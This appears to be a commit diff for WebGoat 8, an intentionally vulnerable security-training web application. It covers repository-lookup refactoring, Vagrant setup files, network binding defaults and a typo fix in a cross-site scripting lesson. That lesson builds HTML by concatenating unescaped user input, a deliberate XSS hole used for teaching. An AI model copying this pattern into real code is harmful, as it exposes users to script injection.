By default binds to ALL network interfaces #431

Fix for Docker not binding to any address by default
All lesson flags are displayed while running webgoat 8.0 standalone java file #430
2018-01-30 07:18:05 +01:00 · 2018-01-29 15:43:19 +01:00 · 2018-01-29 15:32:02 +01:00 · 2018-01-29 15:29:48 +01:00 · 2018-01-21 17:46:43 +01:00 · 2018-01-21 17:13:28 +01:00
51 changed files with 497 additions and 454 deletions
--- a/README.MD
+++ b/README.MD
@ -1,15 +1,11 @@
-# WebGoat: A deliberately insecure Web Application
+# WebGoat 8: A deliberately insecure Web Application
 [![Build Status](https://travis-ci.org/WebGoat/WebGoat.svg?branch=develop)](https://travis-ci.org/WebGoat/WebGoat)
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
 [![Dependency Status](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa/badge.svg?style=flat)](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa)
-[![OWASP Labs](https://img.shields.io/badge/owasp-labs-orange.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
+[![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects) 
-
+[![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest) 
 # Important
 This is the development version of WebGoat 8, if you are looking for a released stable version please go to: https://github.com/WebGoat/WebGoat/wiki/Running-WebGoat
 # Introduction
@ -68,6 +64,20 @@ Download the latest WebWolf release from [https://github.com/WebGoat/WebGoat/rel
 java -jar webgoat-server-<<version>>.jar
 ```
 By default WebGoat starts at port 8080 in order to change this use the following property:
 ```Shell
 java -jar webgoat-server-<<version>>.jar --server.port=9090
 ```
 You can specify one of the following arguments when starting WebGoat:
 ```Shell
 java -jar webgoat-server-<<version>>.jar --server.port=9090 --server.address=x.x.x.x
 ```
 This will start WebGoat on a different port and/or different address.
 ## 3. Run from the sources
@ -99,7 +109,8 @@ mvn -pl webgoat-server spring-boot:run
 ```
 ... you should be running webgoat on localhost:8080/WebGoat momentarily
-To change IP addresss add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
+
 To change IP address add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
 ```
 server.address=x.x.x.x
@ -110,7 +121,7 @@ server.address=x.x.x.x
 We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.
 ```shell
-   $ cd WebGoat/webgoat-images/vagrant-users
+   $ cd WebGoat/webgoat-images/vagrant-training
   $ vagrant up
 ```
@ -120,6 +131,8 @@ The source code will be available in the home directory.
 # Building a new Docker image
 NOTE: Travis will create a new Docker image automatically when making a new release.
 WebGoat now has Docker support for x86 and ARM (raspberry pi).
 ### Docker on x86
 On x86 you can build a container with the following commands:
--- a/pom.xml
+++ b/pom.xml
@ -20,7 +20,7 @@
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.5.RELEASE</version>
+        <version>1.5.9.RELEASE</version>
    </parent>
    <licenses>
--- a/scripts/deploy-webgoat.sh
+++ b/scripts/deploy-webgoat.sh
@ -12,11 +12,11 @@ if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
  docker push $REPO
 elif [ ! -z "${TRAVIS_TAG}" ]; then
  # Creating a tag build we push it to Docker with that tag
-  docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} .
+  docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
  docker push $REPO
 elif [ "${BRANCH}" == "develop" ]; then
  docker build -f Dockerfile -t $REPO:snapshot .
  docker push $REPO
 #elif [ "${BRANCH}" == "develop" ]; then
 #  docker build -f Dockerfile -t $REPO:snapshot .
 #  docker push $REPO
 else
  echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"
 fi
--- a/webgoat-container/documentation/csrf-lesson.gliffy
+++ b/webgoat-container/documentation/csrf-lesson.gliffy
--- a/webgoat-container/documentation/csrf-lessons.png
+++ b/webgoat-container/documentation/csrf-lessons.png
--- a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
@ -34,6 +34,8 @@ import com.google.common.collect.Maps;
 import com.google.common.collect.Sets;
 import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
 import org.owasp.webgoat.asciidoc.WebWolfMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@ -82,6 +84,9 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
                    return new ByteArrayInputStream(new byte[0]);
                } else {
                    StringWriter writer = new StringWriter();
                    JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
                    extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
                    asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
                    return new ByteArrayInputStream(writer.getBuffer().toString().getBytes(UTF_8));
                }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
@ -0,0 +1,25 @@
 package org.owasp.webgoat.asciidoc;
 import org.springframework.beans.BeansException;
 import org.springframework.context.ApplicationContext;
 import org.springframework.context.ApplicationContextAware;
 import org.springframework.core.env.Environment;
 import org.springframework.stereotype.Component;
 /**
 * Make environment available in the asciidoc code (which you cannot inject because it is handled by the framework)
 */
@Component
 public class EnvironmentExposure implements ApplicationContextAware {
    private static ApplicationContext context;
    public static Environment getEnv() {
        return context.getEnvironment();
    }
    @Override
    public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
        context = applicationContext;
    }
 }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
@ -0,0 +1,36 @@
 package org.owasp.webgoat.asciidoc;
 import org.asciidoctor.ast.AbstractBlock;
 import org.asciidoctor.extension.InlineMacroProcessor;
 import org.springframework.core.env.Environment;
 import org.springframework.util.StringUtils;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;
 import javax.servlet.http.HttpServletRequest;
 import java.util.Map;
 public class WebWolfMacro extends InlineMacroProcessor {
    public WebWolfMacro(String macroName, Map<String, Object> config) {
        super(macroName, config);
    }
    @Override
    protected String process(AbstractBlock parent, String target, Map<String, Object> attributes) {
        Environment env = EnvironmentExposure.getEnv();
        String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
        return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
    }
    /**
     * Look at the remote address from received from the browser first. This way it will also work if you run
     * the browser in a Docker container and WebGoat on your local machine.
     */
    private String determineHost(String host, String port) {
        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
        String ip = request.getRemoteAddr();
        String hostname = StringUtils.hasText(ip) ? ip : host;
        return "http://" + hostname + ":" + port + "/WebWolf";
    }
 }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
@ -55,7 +55,7 @@ public abstract class AssignmentEndpoint extends Endpoint {
 	//// TODO: 11/13/2016 events better fit?
    protected AttackResult trackProgress(AttackResult attackResult) {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        if (userTracker == null) {
            userTracker = new UserTracker(webSession.getUserName());
        }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
@ -1,11 +1,9 @@
 package org.owasp.webgoat.lessons;
 import com.google.common.collect.Lists;
 import lombok.*;
-import javax.persistence.Entity;
+import javax.persistence.*;
 import javax.persistence.Id;
 import javax.persistence.OneToMany;
 import javax.persistence.Transient;
 import java.util.List;
 /**
@ -37,19 +35,30 @@ import java.util.List;
 * @version $Id: $Id
 * @since November 25, 2016
 */
@AllArgsConstructor
@RequiredArgsConstructor
@NoArgsConstructor
@Getter
@EqualsAndHashCode
@Entity
 public class Assignment {
-    @NonNull
+
    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;
    private String name;
    @NonNull
    private String path;
    @Transient
    private List<String> hints;
    private Assignment() {
        //Hibernate
    }
    public Assignment(String name, String path) {
        this(name, path, Lists.newArrayList());
    }
    public Assignment(String name, String path, List<String> hints) {
        this.name = name;
        this.path = path;
        this.hints = hints;
    }
 }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
@ -73,7 +73,7 @@ public class LessonMenuService {
    List<LessonMenuItem> showLeftNav() {
        List<LessonMenuItem> menu = new ArrayList<>();
        List<Category> categories = course.getCategories();
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        for (Category category : categories) {
            LessonMenuItem categoryItem = new LessonMenuItem();
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
@ -40,7 +40,7 @@ public class LessonProgressService {
    @RequestMapping(value = "/service/lessonprogress.mvc", produces = "application/json")
    @ResponseBody
    public Map getLessonInfo() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        LessonTracker lessonTracker = userTracker.getLessonTracker(webSession.getCurrentLesson());
        Map json = Maps.newHashMap();
        String successMessage = "";
@ -63,7 +63,7 @@ public class LessonProgressService {
    @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
    @ResponseBody
    public List<LessonOverview> lessonOverview() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        AbstractLesson currentLesson = webSession.getCurrentLesson();
        List<LessonOverview> result = Lists.newArrayList();
        if ( currentLesson != null ) {
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
@ -64,7 +64,7 @@ public class ReportCardService {
    @GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
    @ResponseBody
    public ReportCard reportCard() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        List<AbstractLesson> lessons = course.getLessons();
        ReportCard reportCard = new ReportCard();
        reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
@ -59,7 +59,7 @@ public class RestartLessonService {
        AbstractLesson al = webSession.getCurrentLesson();
        log.debug("Restarting lesson: " + al);
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        userTracker.reset(al);
        userTrackerRepository.save(userTracker);
    }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
@ -47,13 +47,16 @@ import java.util.stream.Collectors;
 */
@Entity
 public class LessonTracker {
-    @Getter
+
    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;
    @Getter
    private String lessonName;
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
    private final Set<Assignment> solvedAssignments = Sets.newHashSet();
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private final List<Assignment> allAssignments = Lists.newArrayList();
+    private final Set<Assignment> allAssignments = Sets.newHashSet();
    @Getter
    private int numberOfAttempts = 0;
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
@ -38,7 +38,7 @@ public class Scoreboard {
        List<WebGoatUser> allUsers = userRepository.findAll();
        List<Ranking> rankings = Lists.newArrayList();
        for (WebGoatUser user : allUsers) {
-            UserTracker userTracker = userTrackerRepository.findOne(user.getUsername());
+            UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
            rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
        }
        return rankings;
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
@ -2,6 +2,7 @@
 package org.owasp.webgoat.users;
 import com.google.common.collect.Lists;
 import com.google.common.collect.Sets;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Assignment;
@ -10,6 +11,7 @@ import javax.persistence.*;
 import java.util.List;
 import java.util.Map;
 import java.util.Optional;
 import java.util.Set;
 import java.util.stream.Collectors;
@ -48,9 +50,11 @@ import java.util.stream.Collectors;
 public class UserTracker {
    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;
    private String user;
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private List<LessonTracker> lessonTrackers = Lists.newArrayList();
+    private Set<LessonTracker> lessonTrackers = Sets.newHashSet();
    private UserTracker() {}
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
@ -8,5 +8,6 @@ import org.springframework.data.jpa.repository.JpaRepository;
 */
 public interface UserTrackerRepository extends JpaRepository<UserTracker, String> {
    UserTracker findByUser(String user);
 }
--- a/webgoat-container/src/main/resources/application.properties
+++ b/webgoat-container/src/main/resources/application.properties
@ -3,6 +3,7 @@ server.error.path=/error.html
 server.session.timeout=600
 server.contextPath=/WebGoat
 server.port=8080
 server.address=127.0.0.1
 spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webgoat
 spring.jpa.hibernate.ddl-auto=update
@ -20,8 +21,8 @@ spring.resources.cache-period=0
 spring.thymeleaf.cache=false
 webgoat.clean=false
-webgoat.server.directory=${user.home}/.webgoat/
+webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
-webgoat.user.directory=${user.home}/.webgoat/
+webgoat.user.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webgoat.build.version=@project.version@
 webgoat.build.number=@build.number@
 webgoat.email=webgoat@owasp.org
--- a/webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
@ -74,7 +74,7 @@ define(['jquery',
            this.loadLesson = function(name,pageNum) {
                if (this.name === name) {
-                    this.listenTo(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
+                    this.listenToOnce(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
                    this.listenTo(this.lessonHintView, 'hints:hideButton', this.onHideHintsButton);
                    this.lessonContentView.navToPage(pageNum);
                    this.lessonHintView.hideHints();
@ -102,12 +102,13 @@ define(['jquery',
                    hasSource:this.lessonInfoModel.get('hasSource')
                });
-                this.listenTo(this.helpControlsView,'hints:show',this.showHints);
+                this.listenTo(this.helpControlsView,'hints:show',this.showHintsView);
                this.listenTo(this.helpControlsView,'lesson:restart',this.restartLesson);
                this.listenTo(this.developerControlsView, 'dev:labels', this.restartLesson);
                this.helpControlsView.render();
                this.showHintsView();
                this.titleView.render(this.lessonInfoModel.get('lessonTitle'));
            };
@ -180,8 +181,13 @@ define(['jquery',
 //                }
 //            };
-            this.showHints = function() {
+            this.showHintsView = function() {
                this.lessonHintView.render();
                if (this.lessonHintView.getHintsCount > 0) {
                    this.helpControlsView.showHintsButton();
                } else {
                    this.helpControlsView.hideHintsButton();
                }
            };
            this.restartLesson = function() {
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
@ -126,6 +126,10 @@ function($,
 			} else {
 				this.$el.find('#show-prev-hint').css('visibility','visible');
 			}
 		},
 		getHintsCount: function () {
 		    return this.collection.length;
 		}
 	});
--- a/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
@ -62,7 +62,7 @@ public class AssignmentEndpointTest {
    public void init(AssignmentEndpoint a) {
        messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        ReflectionTestUtils.setField(a, "userTrackerRepository", userTrackerRepository);
        ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
        ReflectionTestUtils.setField(a, "webSession", webSession);
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
@ -63,7 +63,7 @@ public class LessonMenuServiceTest {
        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
                .andExpect(status().isOk())
@ -81,7 +81,7 @@ public class LessonMenuServiceTest {
        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
@ -72,7 +72,7 @@ public class LessonProgressServiceTest {
    @Before
    public void setup() {
        Assignment assignment = new Assignment("test", "test");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
        when(websession.getCurrentLesson()).thenReturn(lesson);
        when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
@ -53,7 +53,7 @@ public class ReportCardServiceTest {
        when(course.getTotalOfLessons()).thenReturn(1);
        when(course.getTotalOfAssignments()).thenReturn(10);
        when(course.getLessons()).thenReturn(Lists.newArrayList(lesson));
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
        mockMvc.perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
                .andExpect(status().isOk())
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
@ -62,7 +62,7 @@ public class UserTrackerRepositoryTest {
        userTrackerRepository.save(userTracker);
-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
    }
@ -77,7 +77,7 @@ public class UserTrackerRepositoryTest {
        userTrackerRepository.saveAndFlush(userTracker);
-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
    }
@ -90,7 +90,7 @@ public class UserTrackerRepositoryTest {
        userTracker.assignmentFailed(lesson);
        userTrackerRepository.saveAndFlush(userTracker);
-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        userTracker.assignmentFailed(lesson);
        userTracker.assignmentFailed(lesson);
        userTrackerRepository.saveAndFlush(userTracker);
--- a/webgoat-images/vagrant-developers/Vagrantfile
+++ b/webgoat-images/vagrant-developers/Vagrantfile
@ -1,32 +0,0 @@
 Vagrant.configure(2) do |config|
  config.vm.box = "boxcutter/ubuntu1604-desktop"
  config.vm.provider "virtualbox" do |vb|
  	vb.gui = true
  	vb.memory = "4096"
  	vb.cpus = 2
  	vb.name = "WebGoat-Development"
 	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
  end
  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
  config.vm.provision 'shell' do |s|
    s.path = '../vagrant_provision.sh'
    s.privileged = true
  end
  config.vm.provision :shell, privileged:false, inline: <<-SHELL
    echo -e "Cloning the WebGoat container repository"
    git clone -b master https://github.com/WebGoat/WebGoat.git
    echo -e "Cloning the WebGoat Lessons repository"
    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
    SHELL
  config.vm.provision 'shell' do |s|
    s.inline = "echo Finished provisioning, login with user vagrant pass vagrant"
  end
 end
--- a/webgoat-images/vagrant-training/Vagrantfile
+++ b/webgoat-images/vagrant-training/Vagrantfile
@ -0,0 +1,35 @@
 # Setup a Linux box headless which will start WebGoat and WebWolf helpful image to give away during training
 Vagrant.configure(2) do |config|
  config.vm.box = "ubuntu/trusty64"
  config.vm.network :forwarded_port, guest: 8080, host: 8080
  config.vm.network :forwarded_port, guest: 8081, host: 8081
  config.vm.provider "virtualbox" do |vb|
  	vb.gui = false
  	vb.memory = "4096"
  	vb.cpus = 2
  	vb.name = "WebGoat-Training"
 	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
  end
  config.vm.provider "vmware_fusion" do |vf|
    vf.gui = false
    vf.vmx["memsize"] = 4096
    vf.vmx["numvcpus"] = 2
    vf.vmx["displayname"] = "WebGoat-Training"
  end
  config.vm.provision "shell", inline: <<-SHELL
    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar
    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar
    sudo add-apt-repository ppa:openjdk-r/ppa
    sudo apt-get update
    sudo apt-get install openjdk-8-jre -y
    SHELL
  config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL
    java -jar webgoat-server-8.0.0.RELEASE.jar &
    sleep 40s
    java -jar webwolf-8.0.0.RELEASE.jar
    SHELL
 end
--- a/webgoat-images/vagrant-users/Vagrantfile
+++ b/webgoat-images/vagrant-users/Vagrantfile
@ -1,48 +0,0 @@
 #For now use the same as for developers but start WebGoat
 #In the future we can add Docker as well and then Vagrant can start the
 #Docker container or Chef which setups the Tomcat
 Vagrant.configure(2) do |config|
  config.vm.box = "boxcutter/ubuntu1604-desktop"
  config.vm.network :forwarded_port, guest: 8080, host: 9999
  config.vm.provider "virtualbox" do |vb|
  	vb.gui = false
  	vb.memory = "2048"
  	vb.cpus = 2
  	vb.name = "WebGoat-Users"
 	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
  end
  config.vm.provider "vmware_fusion" do |vf|
    vf.gui = false
    vf.vmx["memsize"] = 4096
    vf.vmx["numvcpus"] = 2
    vf.vmx["displayname"] = "WebGoat-Users"
  end
  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
  config.vm.provision 'shell' do |s|
    s.path = '../vagrant_provision.sh'
    s.privileged = true
  end
  config.vm.provision :shell, inline: <<-SHELL
    echo -e "Cloning the WebGoat container repository"
    git clone -b master https://github.com/WebGoat/WebGoat.git
    echo -e "Cloning the WebGoat Lessons repository"
    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
    echo -e "Compiling and installing the WebGoat Container lesson server....."
    mvn -q -DskipTests -file WebGoat/pom.xml clean compile install
    echo -e "Compiling and installing the WebGoat Lessons $COL_RESET"
    mvn -q -DskipTests -file WebGoat-Lessons/pom.xml package
    echo -e "Copying the compiled lessons jars into the container so we can start the lesson server with some base lessons"
    cp -fa ./WebGoat-Lessons/target/plugins/*.jar ./WebGoat/webgoat-container/src/main/webapp/plugin_lessons/
    nohup mvn -q -DskipTests -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war 0<&- &>/dev/null &
    SHELL
  config.vm.provision 'shell' do |s|
    s.inline = "echo Finished provisioning, open a browser and browse to http://localhost:9999/WebGoat/"
  end
 end
--- a/webgoat-images/vagrant_provision.sh
+++ b/webgoat-images/vagrant_provision.sh
@ -1,62 +0,0 @@
 #!/usr/bin/env bash
 set -e
 echo "Setting locale..."
 sudo update-locale LC_ALL=en_US.UTF-8 LANG=en_US.UTF-8
 sudo kill -9 $(lsof -t /var/lib/dpkg/lock) || true
 sudo apt-get update
 sudo apt-get install -y git
 echo "Installing required packages..."
 sudo apt-get install -y -q build-essential autotools-dev automake pkg-config expect
 ## Chrome
 wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
 sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
 sudo apt-get update
 sudo apt-get install -y google-chrome-stable
 ## Java 8
 echo "Provisioning Java 8..."
 mkdir -p /home/vagrant/java
 cd /home/vagrant/java
 test -f /tmp/jdk-8-linux-x64.tar.gz || curl -q -L --cookie "oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-linux-x64.tar.gz -o /tmp/jdk-8-linux-x64.tar.gz
 sudo mkdir -p /usr/lib/jvm
 sudo tar zxf /tmp/jdk-8-linux-x64.tar.gz -C /usr/lib/jvm
 sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_101/bin/java" 1
 sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_101/bin/javac" 1
 sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_101/bin/javaws" 1
 sudo chmod a+x /usr/bin/java
 sudo chmod a+x /usr/bin/javac
 sudo chmod a+x /usr/bin/javaws
 sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_101
 echo "export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_101" >> /home/vagrant/.bashrc
 ## Maven
 echo "Installing Maven.."
 sudo apt-get install -y maven
 ## ZAP
 echo "Provisioning ZAP..."
 cd /home/vagrant
 mkdir tools
 cd tools
 wget https://github.com/zaproxy/zaproxy/releases/download/2.5.0/ZAP_2.5.0_Linux.tar.gz
 tar xvfx ZAP_2.5.0_Linux.tar.gz
 rm -rf ZAP_2.5.0_Linux.tar.gz
 ## IntelliJ
 cd /home/vagrant/tools
 wget https://download.jetbrains.com/idea/ideaIC-2016.1.4.tar.gz
 tar xvfz ideaIC-2016.1.4.tar.gz
 rm -rf ideaIC-2016.1.4.tar.gz
 ## Eclipse
 sudo apt-get -y install eclipse
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
+++ b/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
@ -46,7 +46,6 @@ public class Flag extends Endpoint {
    @PostConstruct
    public void initFlags() {
        IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
        FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
    }
    @Override
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
@ -64,7 +64,7 @@ public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
 		userSessionData.setValue("xss-reflected1-complete",(Object)"false");
 		StringBuffer cart = new StringBuffer();
 		cart.append("Thank you for shopping at WebGoat. <br />You're support is appreciated<hr />");
-		cart.append("<p>We have chaged credit card:" + field1 + "<br />");
+		cart.append("<p>We have charged credit card:" + field1 + "<br />");
 		cart.append(   "                             ------------------- <br />");
 		cart.append(   "                               $" + totalSale);
